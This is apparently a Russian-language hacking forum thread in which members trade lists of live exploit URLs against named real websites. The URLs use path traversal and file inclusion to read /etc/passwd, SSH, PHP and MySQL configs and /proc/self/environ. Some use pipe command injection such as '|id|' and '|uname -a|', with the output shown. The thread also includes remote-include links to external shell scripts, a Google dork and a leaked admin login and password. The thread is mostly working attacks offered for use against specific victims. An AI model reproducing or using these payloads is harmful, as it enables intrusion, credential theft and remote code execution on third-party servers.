http://news.eu123.info/newsletter/lists//admin/index.php
http://unicornnight.com/Newsletter/lists//admin/index.php
http://www.london-executive.com/newsletter/lists//admin/index.php
http://www.ready2move.be/newsletter/lists//admin/index.php
http://www.tstratmann.de/newsletter/lists//admin/index.php
http://www.lightupxmas.com/newsletter/lists//admin/index.php
http://www.dirtragmag.com/newsletter/lists//admin/index.php
http://www.ehl.edu/newsletter/lists//admin/index.php
http://markdionsbartramstravels.com/newsletter/lists//admin/index.php
http://www.lumifilm.fi/newsletter/lists//admin/index.php
http://www.nvcaz.com/newsletter/lists//admin/index.php
http://www.nwa.cc/newsletter/lists//admin/index.php
http://www.euroindy.com/portal/newsletter/lists//admin/index.php
http://www.stone-flooring-tips.com/newsletter/lists//admin/index.php
http://www.tangleweed.org/mail/lists//admin/index.php
http://www.dirtysouthevents.com/mail/lists//admin/index.php
http://www.osdnashville.org/newsletter/lists//admin/index.php
http://oldtownaa.com/mail/lists//admin/index.php
http://odnavaiaescola.com/mail/lists//admin/index.php

http://www.kozcollective.nl/site2/index.php?pagefile=../../../../../../../../../../../../etc/passwd%00
http://www.accessibility.nl/games/index.php?pagefile=../../../../../../../../../../../etc/passwd%00

http://iskatel.org/

http://iskatel.org/?p=4&id=../../admin.php%00

login:Minerale
pass:03051968

Админка: http://iskatel.org/admin.php

P.S. 2 KIR@PRO : Диры читаются не потому что fopen, а потому что ось FreeBSD

http://www.cyclingnews.com/interviews.php?id=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://www.md5search.de/index.php?action=info&language=../../../../../../../../../../../../../etc/passwd%00

http://katenok.pozitiv.lv/miau.php?p=../../../../../etc/passwd

datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
странный сайт, по кэшу гугла когда то был корень,нынче пусто...

Вобщем посмотрел на заголовок, увидел уже после того как нашел... =) eLouai's Download Script ищем в гугле такие есть еще... к примеру:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php

datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
странный сайт, по кэшу гугла когда то был корень,нынче пусто...

Вобщем посмотрел на заголовок, увидел уже после того как нашел... =) eLouai's Download Script ищем в гугле такие есть еще... к примеру:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php
смотрим название темы :)
PHP-инъекты
а это - читалка файлов.

http://www.gnpbu.iip.net/index.php?file=../../../../../boot.ini

http://globaldiscountsclub.com/index.php?option=com_pro_desk&include_file=../../../../../etc/passwd

http://www.gardenlaw.co.uk/cgi-bin/view_ads.cgi?category=39&process=1&template=../../../../../etc/passwd

http://www.jedit.org/index.php?page=features/?page=../../../../../../../../../../../../../etc/passwd%00

http://www.emsc-csem.org/index.php?page=home&sub=gmap/?page=../../../../../../../../../../../../../etc/passwd%00

http://www.bastian-friedrich.de/yappa//index.php?album=../../../../../../../../../../../../../etc/passwd

http://medicalcraft.com//main/index.php?content=../../../../../../../../../../../../../etc/passwd

http://www.velocos.ch/guestbook_e/admin.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00

http://www.hotelambrosianamilano.com/index.php?page=/etc/passwd

http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../etc/passwd

http://www.worldwidepay.com/index.php?read=../../../../../../../../../../../../../../etc/passwd

http://www.thinprint.com/view.php?page=../../../../../etc/passwd%00

http://www.rbgarage.com/rbg/index.php?go=../../../../etc/passwd%00

http://www.eurekalert.org/kidsnews/page.php?page=../../../../../../../etc/passwd%00

www.unicaen.fr (http://www.unicaen.fr/)
Université de Caen Basse-Normandie
-----------------------------
http://www.google.com.ua/favicon.ico Page Rank: 7
http://www.alexa.com/favicon.ico Alexa Rank: 14.516
-----------------------------

POST http://www.unicaen.fr/mrsh/irefi/expos0.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: www.unicaen.fr
Content-type: application/x-www-form-urlencoded
Referer: http://www.google.com/

page=../../../../../etc/passwd['.str_repeat("/.",2021).']
-----------------------------

http://www.balearsculturaltour.es/admin/aplicacion.php?cod=../../../../boot.ini

http://www.peaceduke.su/?content=../../../../../etc/passwd

Сайт, конечно, убогий, инклуд локальный, да еще open_basedir мешает. Как я понял, можно шарить по
/var/www/virtual/peaceduke.su/. Дальше все закрыто, но в папку /tmp доступ есть.

http://www.baikap.de/index2.php?include=../../../../../../../../../../../etc/passwd&id=2&language=EN
вот от меня :)
ЗЫ а искал вообще скул иньекции :)

http://lawreview.law.ucdavis.edu/home.php?page=http://admin.narod.ru/lucky.php?&group=issues
Windows+open_basedir+URL file-access is disabled

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://vw.ddns.uark.edu/index.php?page=phpBB/config
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.vru.gov.ua/index.php?%C3%A5,../../../../../../../../etc/passwd,2911200

Высший совет юстиции Украины! о как =)


================================================== ===
http://fantasyflash.ru/test/?n=../../../../../../etc/hosts
ТиЦ PR
425 6

URL file-access is disabled in the server configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://27pearls.com.ua/?ch=http://microsoft.com/billy.php?

Отель 27 жемчужин.
================================================== ===
Что то плять никто ничего не постит..а тема ведь самая простая))

PR 6
http://www.overseas.doe.go.th:8081/overseas/index.php?lang=en&show=empreport&agencies_id=ftp://rem.com/shell.php?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Вроде как Арбитражный суд москвы! =)
http://jure-arbitr.ru/?rub=ftp://

http://www.raskleim.ru/
http://www.raskleim.ru/?xid=title&sm=titles/../../../../../../../etc/passwd%00

Расклейка объявлений, листовок и афиш в Санкт-Петербурге.
Сайт фуфел конечно но уязвимость есть =)

servizioclienti.repubblica.it
PR 7

http://www.servizioclienti.repubblica.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00

aphp.fr
PR 7

http://www.aphp.fr/index.php?module=../../../../../../../../../../../../../etc/passwd%00

worldsteel.org
PR 6

http://www.worldsteel.org/index.php?action=../../../../../../../../../../../../../etc/passwd%00

www.reformtheun.org
PR 6

http://www.reformtheun.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00

filmmusic.net
PR 5

http://www.filmmusic.net/page.php?page=../../../../../../../../../../../../../etc/passwd%00

thewho.com
PR 5

http://www.thewho.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00

2kgames.com
pr6 | tic 400

http://www.2kgames.com/index.php?p=../../../../../../etc/passwd%00

utbookstore.tennessee.edu

http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00

stefanmay.com

http://www.stefanmay.com/index.php?p=../../../../../etc/passwd%00

http://www.myspace-layouts.us/pages.php?page=../index

http://www.vcdh.virginia.edu/index.php?page=../../../etc/passwd%00

мде
http://ssw.uconn.edu/index.php?path=index.php%00

http://rastaman.tales.ru/?page=lol&menu1=1&menu2=2&smenu1=1&inctext=6

может и боян не знаю
но сказки там клевые ) еще попробуйте поиздеватся над переменными остальные тоже много интересного

_http://www.logicnsk.ru/price/?file=../../../../../../etc/passwd&cat_id=654

http://gps.ck.ua/index.php?id=../../

можно еще вот здесь покопатся

http:// de n.zp.ua/index.php?page=../filename

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00

http://fanforum.org.ua/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://www.itnr.ru/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://wirfilms.com/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html

http://www.hcs.harvard.edu/gradmus/abstract.php?name=../../../../../../../../../../../../../../../etc/passwd%00

или так

http://www.hcs.harvard.edu/gradmus/abstract.php?name=../abstract.php%00
:)

http://www.mtcwork.com.au/innovation.php?file=../../../../../../../../../../etc/passwd
OS: FreeBSD

U.S. Department of Housing and Urban Development
http://www.hud.gov/news/release.cfm?content=../../../../../../../../../../etc/passwd

ololo
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/apache2/httpd.conf

Здесь для этого, наверное, самое место.

Master PFP (Printer Friendly Page) v1.7 - multi-file include
Off.site: www.willmaster.com (http://www.willmaster.com)
Google: 'inurl:MasterPFP.pl?doc='

Скидываю оптом =]

На Офф.сайте:
www.willmaster.com/software/pfp/MasterPFP.cgi?doc=../../../
.edu
www.rsp.wisc.edu/scripts/MasterPFP.pl?doc=../../../../../etc/passwd
Выполнение команд:
http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
http://www.german-philharmonic-bigband.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
И т.д:
www.vtol.org/cgi-bin/masterpfp.cgi?doc=../../../../etc/passwd
www.womensweb.ca/cgi-bin/MasterPFP.cgi?doc=../../../../etc/passwd
www.dianaskitchen.com/cgi-bin/MasterPFP.cgi?doc=../../../etc/passwd
www.faktuell.de/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
www.genuinecoaching.com/cgi/MasterPFP/MasterPFP.cgi?doc=../../../../../../../etc/passwd
www.delbert.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
www.circare.org/FOIA/MasterPFP.cgi?doc=../../../etc/passwd
www.eagleforum.org/cgi_bin/print/MasterPFP.cgi?doc=../../../../../../etc/passwd
www.varstrat.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd

http://www.3sys.de/index/index.pl?url=download-index.de&seite=|id|

uid=30(wwwrun) gid=60001(visas) groups=60001(visas)

http://www.3sys.de/index/index.pl?url=download-index.de&seite=|which%20wget|

/usr/bin/wget


; ))))))

1)
leinebeerfilms.nl
http://www.kleinebeerfilms.nl/cgi-bin/index.pl?page=../../../../../../../../../etc/passwd%00.txt
neilthompson.us
http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|id|

uid=465686 gid=888(vusers) groups=33(www-data)

http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|which%20wget|

/usr/bin/wget

удачи с заливкой шелла ; ))

http://iah.ipm.illinois.edu/index.php?ch=../../etc/passwd

[PR 4]
http://www.sitemad.com/index.php?p=popup&tpl=/etc/passwd
[PR 3]
http://www.doc-darmer-net.de/hpmaker/index.php?p=/etc/passwd
[PR 2]
http://www.gustatus.org/index.php?p=index.php

http://mzrd.ru/?f=../../../../../../../../../../../../../etc/passwd%00

www.CBC.ca - Canadian News [PR 8]
www.cbc.ca/cgi-bin/quiz/quiz.cgi?quiz=../../../../../../../../etc/passwd%00

catenabrasil.com

http://catenabrasil.com/portal/index.php?arq=[SHELL]

WINNT

http://lib.mjes.tpc.edu.tw:9999/appserv/main.php?appserv_root=[shell]

.edu.pl [PR 5]

http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../etc/passwd%00

http://www.beauteby.com/ru/gernetic/luxe.php?id=../../../../index

http://www.orion.ua/modules/CATALOG/download.php?file=../../../../../../../../../../../../../../../../../etc/passwd%00%00

LFI

Много чего интересного,но к сайтам на VPS закрыт доступ (((.Толком-то я там не исследовал ничего...httpd.conf оежит по стандартному пути - /etc/httpd/conf/httpd.conf

В общем,если что надыбаете - пишите в PM/ЛС/icq )

И ещё: Если фаил или папка существует,то выдаст на скачку .pdf фаил.Переименовываете его в .doc(Так сразу форматирует,не то,что txt) или в .html.Если html,то открываете IE(имхо - лучший вариант).Если фаила нету,то просто белый экран.Также проверяются и каталоги.Если нету прав,то выдастся на скачку фаил в 1 KB.Там будет ошибка в file_get_contents() и сама ошибка - Permission Denied.Вот и всё.Спасибо всем:)

http://www.wines.at/forum/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00%00

сайт по борьбе с торчками

http://nobf.ru/index.php/download.php?file=../../../../../../etc/passwd

http://ezonet.ru/reports.php?page=../index.php
http://www.911pcar.com/index.php?page=../../../etc/passwd
http://aplus-computer.net/myspacegraphicshelper/onlinepss//index.php?page=../index.php

[PR 4]
http://triod.kiev.ua/index.php?page=index.php
[PR 4]
http://www.chicagohungarians.com/index.php?page=/etc/passwd
[PR 3]
http://www.dbd.com.au/index.php?page=index.php
[PR 0]
http://legeartis-stom.com/index.php?page=/etc/passwd

http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

Директория сайта: /usr/www/cyl.ru/www/

http://www.lohuis.ro/index.php?page=../../../../../../../../../../etc/passwd%00

На баяны не проверял:

http://www.americascup.com/es/acmag/votre_interview/index.php?idContent=12688&idIndex=../../../../../../../../../../etc/passwd%00

http://www.clubedoexercito.com.br/index.php?arq=/home/httpd/vhosts/clubedoexercito.com.br/httpdocs/index

http://www.inoticia.com.br/index.php?arq=/home/httpd/vhosts/inoticia.com.br/httpdocs/config/config

http://www.aciub.com.br/index.php?arq=/var/www/dominios/www.aciub.com.br/site/index

http://www.coacyle.com/index.php?sec=D:%5CTrabajos%5Cwwwcoacyle%5Ccontrol %5Cincludes%5Cfunciones&id=81

http://www.dalcomstechnologies.com/products.php?id=[LFI]

PR 4
http://toyota.mnc.ru/?path=../../../etc/&file=passwd


PR 3
http://www.divetrade.ru/magazin/index.php?page=../../../../../../../../../../etc/passwd
(онлайн шоп на FreeBSD)

PR 3
http://www.autosport.com.ua/index.php?part=FAU&page=../../../../../../../../../../../etc/passwd

PR 3
http://www.alpha-sport.ru/index.php?page=index.php

PR 2
http://www.basegroup.su/index.php?Page=/../../../../../../../../../../../etc/passwd

http://www.ahoj-brause.de/produkte.php?id=3&sub=[LFI]

PR4
http://tunguska.sai.msu.ru/index.php?q=[LFI]

PR0
http://obti.com.ua/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

http://www.uspeh-b.ru/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

http://www.govor.ru/visit/tours/i mg.php?location=/etc/passwd

сохраняем и открываем...

PR2
http://catviz.sourceforge.net/index.php?userman_form=../../../../../../../../../../../../../etc/passwd

gaff
http://www.bfhd.wa.gov/news/news.php?newsflash=../../../../../../../../apache/conf/httpd.conf

http://www.midland.edu/success/students.php?page=../../robots.txt

http://inss.ru/index.php?id=index.php

http://www.imageup.ru/img12/rowdown2153787.png

PR3
http://www.galileo-tv.ru/inner.php?page=[LFI]

Можно через картинку залить shell

Немножко инъекций и читалок, включая слепые, скорее всего многого не было, т.к. пока не видел еще сканеров, когда ошибки не выводятся:


http://www.pudasjarvi.fi/deutsch/index.php?file=/etc/passwd
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/access_log
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/error_log
----------------------------
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/mysql/my.cnf
-----------------------------
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/my.cnf
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../usr/bin/grep

-----------------------------
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://www.bird.org.tw/index.php?block=../../../../etc/passwd
http://www.bird.org.tw/index.php?block=../../../../etc/ssh/sshd_config
-----------------------------
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/ssh/sshd_config
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/mysql/my.cnf
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/proftpd/modules.conf
-----------------------------
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/php.ini
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/my.cnf
-----------------------------
http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
http://www.tonie.net/index.php?p=../../../../../../../etc/ssh/sshd_config
http://www.tonie.net/index.php?p=../../../../../../../etc/apache2/httpd.conf
http://www.tonie.net/index.php?p=../../../../../../../etc/mysql/my.cnf
http://www.tonie.net/index.php?p=../../../../../../../etc/vsftpd.conf
------------------------------
-----------------------------
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/php/php.ini
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../usr/bin/grep
-----------------------------
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../proc/self/environ
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/ssh/sshd_config
-----------------------------
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/passwd
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../proc/self/environ
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/httpd/conf/httpd.conf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../usr/local/etc/php.ini
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/my.cnf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/logrotate.d/vsftpd.log
-----------------------------
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/access_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/error_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/conf/httpd.conf
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/etc/httpd/conf/httpd.conf
-------------------------------
http://www.toshin.com/cgi-bin/news/headline/view.cgi?File=|uname%20-a|
http://shimizu.dyndns.tv/simizu-t/cgi-bin/link.cgi?file=|uname%20-a|
http://f22.aaa.livedoor.jp/~gbwars/cgi-bin/gbw/turn/chdata.cgi?file=|uname%20-a|
http://www.nurs.or.jp/~siizuka/cgi-bin/download.cgi?file=|uname$IFS-a|
-----------------------------
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/passwd
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../proc/self/environ
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/apache2/httpd.conf
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/php5/apache2/php.ini
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../usr/bin/grep
-----------------------------
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/passwd
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../proc/self/environ
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/ssh/sshd_config
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/apache2/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/cgi/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/mysql/my.cnf
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/passwd
http://www.soccer7.org/show.pl?file=../../../../../../../../../proc/self/environ
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/access_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/error_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/php.ini
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/my.cnf
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/maillog
-----------------------------
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/passwd
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/ssh/sshd_config
http://www.acomputerguy.org/index.php?file=../../../../../../../../../var/log/httpd/access.log
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/etc/php.ini

http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
----

http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

---

http://valganoored.leadmaster.pri.ee/?id=index.php%00

---

http://radomiak.info/index.php?id=index.php%00

---

http://www.classic-appraisals.com/?id=index.php

http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/passwd&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/ssh/sshd_config&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../usr/local/etc/php.ini&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/my.cnf&top=self&bottom=self
------------------------------
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/passwd&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../proc/self/environ&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/ssh/sshd_config&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/php.ini&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/my.cnf&lang=german&source=index&title=Netboot-Spezifikation
-----------------------------
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/passwd%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../proc/self/environ%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/ssh/sshd_config%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/httpd/conf/httpd.conf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/php.ini%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/my.cnf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../var/log/maillog%00
-----------------------------
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/passwd%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../proc/self/environ%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/php.ini%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/my.cnf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/logrotate.d/vsftpd.log%00
-----------------------------
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../etc/passwd
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../proc/self/environ

[PR 6]
http://web.ce.metu.edu.tr/index.php?id=../../../index
[PR 6]
http://www.ipp.mesi.ru/edu/index.php?id=index

http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd
:(

http://www.jlc-software.com/?page=../../../../etc/passwd
:)
Safe mode :(

http://www.mumost.cz/informace/index.htm?fr2=../../../ и тд и тп)

[PR 6]
http://www.piedmont.edu/index.php?id=../index.php%00

http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/passwd%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/ssh/sshd_config%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/httpd.conf%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../var/log/maillog%00

-----------------------------
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/passwd%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/php.ini%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/my.cnf%00


-----------------------------
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/passwd%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../var/log/xferlog%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00


-----------------------------
http://www.biblestudytools.com/History/AD/EarlyChurchFathers/Ante-Nicene/Origen/view.cgi?file=../../../../../../../../../../../../../../etc/passwd

http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd

----------------------------- fuck owner:)
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - тут грязно ругается почему-то
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00

http://dtv.horizont.by/index.php?id=../../../../../../etc/passwd

вродь немало там хостится..

http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00

Ещё партеечка ;)

http://www.cityteam.org/news/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.santana-aschaffenburg.de/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.tanzi.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://wiki.colortent.com/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://ja7nwi.ddo.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://www.savvycircle.com/page.php?page=../../../../../../../../../../../../../etc/passwd%00
http://www.oralabs.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://rubistar.4teachers.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://hibbingcurling.com/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://accessnorth.net/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.accessnorth.net/letterit/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.hamptonct.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
